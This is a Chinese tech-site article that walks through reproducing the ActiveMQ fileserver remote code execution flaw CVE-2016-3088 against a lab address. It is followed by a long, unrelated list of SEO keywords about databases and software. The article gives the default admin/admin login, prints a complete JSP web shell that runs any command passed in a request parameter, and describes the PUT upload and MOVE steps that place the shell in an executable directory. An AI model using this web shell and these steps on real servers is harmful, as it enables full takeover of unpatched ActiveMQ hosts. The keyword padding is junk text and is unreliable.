ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的
发表于:2025-12-02 作者:千家信息网编辑
千家信息网最后更新 2025年12月02日,本篇文章给大家分享的是有关ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看
千家信息网最后更新 2025年12月02日ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的
本篇文章给大家分享的是有关ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。
ActiveMQ 是 Apache 软件基金会下的一个消息驱动中间件软件。Jetty 是一个 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后一个监控 ActiveMQ 的 Web 应用。
下面仅作漏洞复现记录与实现,利用流程如下:
1.漏洞环境
链接:http://192.168.101.152:8161
2.利用
访问链接: http://192.168.101.152:8161/admin/test/systemProperties.jsp
默认账户密码为:admin/admin
得到真实路径
使用PUT方法上传小马至/fileserver/目录下
<%@ page import="java.io.*" %><%try {String cmd = request.getParameter("cmd");Process child = Runtime.getRuntime().exec(cmd);InputStream in = child.getInputStream();int c;while ((c = in.read()) != -1) {out.print((char)c);}in.close();try {child.waitFor();} catch (InterruptedException e) {e.printStackTrace();}} catch (IOException e) {System.err.println(e);}%>访问目标,没有解析
使用MOVE方法将其转移至api或admin目录下
Destination: file:///opt/activemq/webapps/api/q.jsp

上传成功后访问,执行
执行成功
以上就是ActiveMQ远程代码执行漏洞CVE-2016-3088是怎么复现的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注行业资讯频道。
漏洞
代码
成功
容器
方法
更多
环境
目录
知识
篇文章
软件
链接
实用
中间件
基金
基金会
密码
小马
就是
工作会
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
护苗网络安全教育课视屏
大兴区技术软件开发服务供应
gmlan网络技术
宿州通信软件开发公司哪家好
软件开发公司测试团队的优势
软件开发可用图片
pg数据库语法区别
c 通用数据库连接类
基本的网络安全防御产品有哪些
dns辅服务器是什么
苹果查找未连接服务器
网络安全防护的体会
清华网络安全专业课表
配置文件存数据库优劣
网络技术入门经典 百度云
苏州有农网络技术招聘信息
团委宣传小组网络安全
创业软件开发项目
网卡导致服务器ping不通
手机银行的服务器异常
数据库的四个对象
国泰安数据库没有公司名字
最新的无线网络技术
科技改变生活互联网大会
软件开发需要掌握哪些知识
网络安全知识竞赛活动报道
上海正规软件开发服务保障
病毒感染服务器的办法是什么
生物谷数据库
创业软件开发项目